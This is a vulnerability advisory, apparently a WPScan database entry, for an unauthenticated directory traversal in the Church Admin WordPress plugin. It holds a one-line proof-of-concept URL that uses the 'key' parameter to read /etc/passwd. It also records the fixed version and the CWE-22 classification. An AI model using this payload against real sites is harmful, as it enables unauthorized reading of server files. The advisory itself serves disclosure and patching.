Church Admin 0.33.2.1 - Unauthenticated Directory Traversal

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The "key" parameter of download.php from plugins/church-admin/display/download.php is not sanitized and is vulnerable to a directory traversal type of attack.
Proof of Concept
http://<site>/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd

Affects Plugin

fixed in version 0.565

References

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Submitter malwrforensics
Submitter Website http://www.malwrforensics.com
Submitter Twitter @malwrforensics
Views 115
Verified No
WPVDB ID 8997

Timeline

Publicly Published 2017-12-28 (4 months ago)
Added 2018-01-10 (3 months ago)
Last Updated 2018-01-10 (3 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.